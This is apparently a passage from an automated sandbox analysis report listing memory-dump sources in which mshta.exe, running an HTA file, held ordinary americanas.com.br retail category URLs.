Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437986277.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-e-seca?chave=pfm_hm_tt_1_0_lava-e-seca
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403823205.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462978019.000000000B696000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460847777.000000000B657000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489928071.000000000B699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-loucas?chave=pfm_hm_tt_1_0_lava-loucas
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429899466.00000000067FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422769315.00000000067FA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438057460.00000000067FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485650837.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/maquina-de-lavar?chave=pfm_hm_tt_1_0_maquin
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25482972272.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/micro-ondas?chave=pfm_hm_tt_1_0_micro-ondas
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398642519.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/pecas-para-eletrodomesticos
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edom
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edomlar
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edoms-p
Source: mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436128428.0000000009C46000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400654336.000000000ABA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodom
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400942493.000000000ABD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_home_edom_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_home_edom_menua
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383830981.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458381198.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/aspirador-de-po?chave=pfm_hm_tt_1_0_aspirado
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/batedeira?chave=pfm_hm_tt_1_0_batedeira
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403501791.000000000AC22000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488222994.000000000AC23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/bebedouro-e-purificador-de-agua/purificador-
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/cafeteira?chave=pfm_hm_tt_1_0_cafeteira
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383830981.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432084842.0000000009C17000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/ferro-de-passar?chave=pfm_hm_tt_1_0_ferro-de
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25429899466.00000000067FB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422769315.00000000067FA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438057460.00000000067FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 